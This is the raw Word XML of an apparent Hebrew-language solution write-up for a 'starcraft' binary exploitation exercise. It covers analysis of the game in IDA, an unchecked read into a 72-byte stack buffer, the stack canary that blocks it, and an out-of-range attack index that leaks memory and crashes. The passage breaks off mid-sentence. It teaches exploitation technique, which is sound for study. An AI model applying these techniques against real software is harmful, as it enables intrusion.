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5354" w14:textId="3FE2BD96" w:rsidR="001D2F56" w:rsidRPr="007D41FF" w:rsidRDefault="00AB3939">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D41FF">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">פתרון לתרגיל </w:t>
      </w:r>
      <w:r w:rsidRPr="007D41FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>starcraft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788FF888" w14:textId="5AAA34B5" w:rsidR="00AB3939" w:rsidRDefault="00AB3939">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ראשית, מנסיון ראשוני להשתמש בתוכנה וממעבר מלמעלה על הפסאודו-קוד ב</w:t>
      </w:r>
      <w:r>
        <w:t>ida</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> אנחנו רואים שמדובר במשחק בו המשתמש מתבקש לבחור שחקן ואז הוא נלחם איתו ביריבים אקראיים (שמנוהלים על ידי המחשב) עד שנגמר לו החיים (ה</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
        </w:rPr>
        <w:t>HP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB4E7C8" w14:textId="28942DAC" w:rsidR="00AB3939" w:rsidRDefault="00A66B96" w:rsidP="00A66B96">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">עתה נחפש בקוד מקומות שתיתכן עבורם </w:t>
      </w:r>
      <w:r>
        <w:t>buffer overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">. הפונקציה </w:t>
      </w:r>
      <w:r>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A770F79" w14:textId="65AEA644" w:rsidR="00A66B96" w:rsidRDefault="00A66B96">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A66B96">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DDCFA9F" wp14:editId="38B4F987">
            <wp:extent cx="5236210" cy="426720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23" b="2098"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="523621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7D1B" w14:textId="11D58444" w:rsidR="00A66B96" w:rsidRDefault="00A66B96">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A66B96">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EE7F503" wp14:editId="546F928A">
            <wp:extent cx="5274310" cy="3003550"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635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D8EA" w14:textId="2FC62926" w:rsidR="00523702" w:rsidRDefault="00523702" w:rsidP="00523702">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">באופן כללי מבנה הקוד הוא: המשתמש מתבקש לבחור </w:t>
      </w:r>
      <w:r w:rsidR="00456AB2">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">כלי שאיתו ישחק </w:t>
      </w:r>
      <w:r w:rsidR="00456AB2">
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00456AB2">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נוצר אובייקט מתאים לכלי שבחר. לאחר מכן הלולאה הראשית ממבצעת (עד 99 פעמים): המחשב מגריל כלי ויוצר עבורו אוביקט מתאים. המחשב תוקף את המשתמש. </w:t>
      </w:r>
      <w:r w:rsidR="00C6044E">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ולאחר מכן המשתמש תוקף את המחשב וחוזר חלילה עד שאחד מהם מת. אם המשתמש מת המשחק נגמר ואם המחשב מת עוברים לשלב הבא (איטרציה הבאה)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473FDE79" w14:textId="748E9211" w:rsidR="00523702" w:rsidRDefault="00523702" w:rsidP="00523702">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ניתן לראות בשורות 71 ו-75 קריאות מה</w:t>
      </w:r>
      <w:r>
        <w:t>stdin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (ע"י </w:t>
      </w:r>
      <w:r>
        <w:t>cin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">) אל באפר בגודל 72 ללא בדיקה של אורך הקלט. נשים לב ששורות אלו מתבצעות בתוך הלולאה </w:t>
      </w:r>
      <w:r w:rsidR="00C6044E">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>הראשית רק בתנאי ש:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C86934F" w14:textId="52105F78" w:rsidR="00C6044E" w:rsidRDefault="00C6044E" w:rsidP="00523702">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">א. </w:t>
      </w:r>
      <w:r>
        <w:t>g_level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (משתנה גלובלי) הוא לפחות 11 (מאחר שהוא מתחיל מאפס זה אומר שאנחנו בשלב 12 ומעלה)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9DE79B" w14:textId="15F9EE5A" w:rsidR="00C6044E" w:rsidRDefault="00C6044E" w:rsidP="00523702">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ב. המשתמש ניצח את השלב הנוכחי.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3039A56C" w14:textId="0DE58478" w:rsidR="00C6044E" w:rsidRDefault="00C6044E" w:rsidP="00523702">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>כלומר כדי לנסות לנצל את הכתיבה הלא מבוקרת הנ"ל יש לנצח לפחות 12 פעמים (ברצף כמובן).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3917A7A4" w14:textId="5BFF8171" w:rsidR="00C6044E" w:rsidRDefault="00C6044E" w:rsidP="00523702">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">מניסוי וטעיה ניתן לראות מהר מאד שהדרך היחידה להצליח (בהסתברות סבירה) לנצח 12 פעמים ברצף היא רק דרך הכלי </w:t>
      </w:r>
      <w:r>
        <w:t>Templar</w:t>
      </w:r>
      <w:r w:rsidR="007D41FF">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> לכלי </w:t>
      </w:r>
      <w:r w:rsidR="007D41FF">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">זה יש אופציה מיוחדת הנקראת </w:t>
      </w:r>
      <w:r w:rsidR="00511414">
        <w:t>acron warp</w:t>
      </w:r>
      <w:r w:rsidR="00511414">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שהופכת אותו מ</w:t>
      </w:r>
      <w:r w:rsidR="00511414">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00511414">
        <w:t>emplar</w:t>
      </w:r>
      <w:r w:rsidR="00511414">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ל</w:t>
      </w:r>
      <w:r w:rsidR="00511414">
        <w:t>Acron</w:t>
      </w:r>
      <w:r w:rsidR="00511414">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> בעל מגן 350 והתקפה 50. זהו הכלי החזק ביותר ואיתו אכן אפשר (בהסתברות סבירה) לנצח 12 פעמים ברצף.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD8F3E2" w14:textId="497CC91F" w:rsidR="00DB7497" w:rsidRPr="00DB7497" w:rsidRDefault="00511414" w:rsidP="00DB7497">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">אולם לאחר </w:t>
      </w:r>
      <w:r w:rsidR="003129D0">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>הניסיון לדרוס את כתובת החזרה שבמחסנית ניתקל בשגיאה הבאה:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DC5E8B" w14:textId="0A110E01" w:rsidR="003129D0" w:rsidRDefault="00DB7497" w:rsidP="00523702">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB7497">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ED12D1A" wp14:editId="4EAF405E">
            <wp:extent cx="5274310" cy="301039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246"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="30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FB3A" w14:textId="0DF9DC82" w:rsidR="00DB7497" w:rsidRDefault="0068191F" w:rsidP="00523702">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>התוכנית מזהה שדרסנו את כתובת החזרה!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458D2112" w14:textId="11B84F6E" w:rsidR="0068191F" w:rsidRDefault="0068191F" w:rsidP="00523702">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">זיהוי זה הוא כתוצאה מהפעלת מנגנון ההגנה </w:t>
      </w:r>
      <w:r>
        <w:t>canary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>. ניתן לראות שאכן מנגנון זה מופעל:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CBDD57" w14:textId="2D46BD2F" w:rsidR="0068191F" w:rsidRDefault="0068191F" w:rsidP="00523702">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068191F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2712B64E" wp14:editId="29F814E7">
            <wp:extent cx="5274310" cy="419862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70B2" w14:textId="2D256A3A" w:rsidR="0068191F" w:rsidRDefault="00CE792C" w:rsidP="00523702">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>או בקוד האסמבלי:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6908A4" w14:textId="4F6B355A" w:rsidR="00CE792C" w:rsidRDefault="00CE792C" w:rsidP="00523702">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>בתחילת הפונקציה:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEAA492" w14:textId="7A69666C" w:rsidR="00CE792C" w:rsidRDefault="00CE792C" w:rsidP="00523702">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE792C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C64E17A" wp14:editId="252AEA40">
            <wp:extent cx="4143953" cy="2124371"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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40E2" w14:textId="1287EE13" w:rsidR="00CE792C" w:rsidRPr="00CE792C" w:rsidRDefault="00CE792C" w:rsidP="00523702">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">שומרים את </w:t>
      </w:r>
      <w:r>
        <w:t>fs:28h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שהוא ה</w:t>
      </w:r>
      <w:r>
        <w:t>canary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ב </w:t>
      </w:r>
      <w:r>
        <w:t>var18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ואז בסוף הפונקציה:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CCDE3B" w14:textId="505B12C9" w:rsidR="00CE792C" w:rsidRDefault="00CE792C" w:rsidP="00523702">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE792C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="755DCDDD" wp14:editId="2AAF964A">
            <wp:extent cx="1905266" cy="2848373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7B97" w14:textId="2874A83C" w:rsidR="003F33AE" w:rsidRDefault="003F33AE" w:rsidP="00523702">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">בודקים אם הערך שונה. אם הוא שונה סימן שהייתה תקיפת </w:t>
      </w:r>
      <w:r>
        <w:t>bufferoverflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> והפונקציה לא חוזרת לכתובת חזרה שעל המחסנית.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C08D36" w14:textId="7D10F75E" w:rsidR="003F33AE" w:rsidRDefault="003F33AE" w:rsidP="003F33AE">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>אם כן אין ברירה ונחפש מקום אחר שאפשר לתקוף.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEED0FB" w14:textId="55930B7C" w:rsidR="00FA6ECB" w:rsidRDefault="00FA6ECB" w:rsidP="003F33AE">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>באחת ההרצות הראשונות שניסיתי להריץ את התכנית נתקלתי במקרה בתופעה מוזרה:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052C81E5" w14:textId="0376459F" w:rsidR="00FA6ECB" w:rsidRDefault="00FA6ECB" w:rsidP="003F33AE">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA6ECB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E80AA96" wp14:editId="5C4CA582">
            <wp:extent cx="5274310" cy="4184650"/>
            <wp:effectExtent l="0" t="0" r="254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8C9F" w14:textId="00D23DF0" w:rsidR="00FA6ECB" w:rsidRDefault="00FA6ECB" w:rsidP="003F33AE">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA6ECB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B62A4B4" wp14:editId="0E5227EC">
            <wp:extent cx="5274310" cy="3970655"/>
            <wp:effectExtent l="0" t="0" r="254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251" w14:textId="002A65C9" w:rsidR="00FA6ECB" w:rsidRDefault="00FA6ECB" w:rsidP="003F33AE">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA6ECB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="666995CF" wp14:editId="79B71841">
            <wp:extent cx="5274310" cy="4070985"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715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058" w14:textId="339D72A3" w:rsidR="00FA6ECB" w:rsidRDefault="00FA6ECB" w:rsidP="003F33AE">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA6ECB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01F985DB" wp14:editId="14985910">
            <wp:extent cx="5274310" cy="429387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70E" w14:textId="35E5D5D3" w:rsidR="00FA6ECB" w:rsidRDefault="008F46F6" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">החלק המיוחד היה שבחרתי ב </w:t>
      </w:r>
      <w:r>
        <w:t>Templar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שלו יש 4 התקפות אפשריות (0-3) ואז לאחר שהפכתי אותו ל</w:t>
      </w:r>
      <w:r>
        <w:t>Acron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ולפי המודפס יש רק התקפה אפשרית אחת (0) בכל זאת בחרתי 1, 2 או 3 (התקפות שלא אמורות להיות קיימות) וזה הוביל להדפסות מוזרות (</w:t>
      </w:r>
      <w:r>
        <w:t>is burrowed : 1043030288</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>is burrow-able? : 32570</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">) ובסוף לקריסת </w:t>
      </w:r>
      <w:r>
        <w:t>Segmentation fault</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D48C6E9" w14:textId="45EB8C42" w:rsidR="008F46F6" w:rsidRDefault="006F5B41" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>נחקור את הדבר הזה (מה שיוביל בסופו של דבר אל הפתרון):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78708881" w14:textId="607578D8" w:rsidR="006F5B41" w:rsidRDefault="00E85AA3" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">אם נתבונן בבנאי של </w:t>
      </w:r>
      <w:r>
        <w:t>Templar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5A3956" w14:textId="03673715" w:rsidR="00E85AA3" w:rsidRDefault="00554CED" w:rsidP="00554CED">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00554CED">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57EE111E" wp14:editId="38493912">
            <wp:extent cx="5274310" cy="1670050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350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AFD7" w14:textId="60F1369C" w:rsidR="00E85AA3" w:rsidRDefault="00E85AA3" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">נבחין </w:t>
      </w:r>
      <w:r w:rsidR="00554CED">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>שחוץ מאתחול סטנדרטי של ה</w:t>
      </w:r>
      <w:r w:rsidR="00554CED">
        <w:t>members</w:t>
      </w:r>
      <w:r w:rsidR="00554CED">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> הרגילים (</w:t>
      </w:r>
      <w:r w:rsidR="00554CED">
        <w:t>vftable, isComputer, hp, shield, weapon, armor</w:t>
      </w:r>
      <w:r w:rsidR="00554CED">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">) יש גם </w:t>
      </w:r>
      <w:r w:rsidR="00554CED">
        <w:t>member</w:t>
      </w:r>
      <w:r w:rsidR="00554CED">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> חדש שהוא מצביע לאוביקט </w:t>
      </w:r>
      <w:r w:rsidR="00554CED">
        <w:t>acron</w:t>
      </w:r>
      <w:r w:rsidR="00554CED">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F11F9">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> בהתחלה הוא מאותחל להצביע אל </w:t>
      </w:r>
      <w:r w:rsidR="006F11F9">
        <w:t>Templar</w:t>
      </w:r>
      <w:r w:rsidR="006F11F9">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> עצמו.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C8E70D" w14:textId="0041812D" w:rsidR="00795DF1" w:rsidRDefault="00795DF1" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">בנוסף יש את האתחול הסטנדרטי של מחלקת האב </w:t>
      </w:r>
      <w:r>
        <w:t>Protoss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C055291" w14:textId="527F0158" w:rsidR="00795DF1" w:rsidRDefault="0083449E" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083449E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72E563CA" wp14:editId="65323743">
            <wp:extent cx="4382112" cy="1457528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7E68" w14:textId="3AE06601" w:rsidR="0083449E" w:rsidRDefault="0083449E" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">שבו מאתחלים </w:t>
      </w:r>
      <w:r>
        <w:t>member</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שמצביע לכתובת של הפונקציה </w:t>
      </w:r>
      <w:r>
        <w:t>exit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (של </w:t>
      </w:r>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1330648B" w14:textId="563EB7B5" w:rsidR="006F11F9" w:rsidRDefault="006F11F9" w:rsidP="008F46F6">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">עתה כאשר </w:t>
      </w:r>
      <w:r>
        <w:t>Templar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
